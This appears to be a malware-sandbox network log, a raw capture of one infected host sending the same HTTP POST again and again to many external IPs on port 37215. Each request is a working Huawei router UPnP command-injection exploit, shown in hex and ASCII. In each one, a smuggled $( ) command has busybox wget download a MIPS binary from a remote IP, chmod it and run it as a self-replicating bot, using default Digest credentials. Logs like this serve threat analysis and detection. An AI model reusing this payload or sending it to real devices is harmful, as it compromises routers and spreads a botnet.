                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1402192.168.2.2344178157.99.61.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470793962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1403192.168.2.2342500157.173.118.17537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470794916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1404192.168.2.235876841.133.100.2337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470864058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1405192.168.2.2334356197.138.3.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470873117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1406192.168.2.2353576157.16.34.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470923901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1407192.168.2.2352298157.180.181.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.470983982 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1408192.168.2.2351212157.231.2.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.471055031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1409192.168.2.2341204108.107.74.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.471071959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1410192.168.2.2339322132.207.86.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.471079111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1411192.168.2.23485509.152.198.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.471170902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1412192.168.2.234454441.46.50.20337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.471172094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
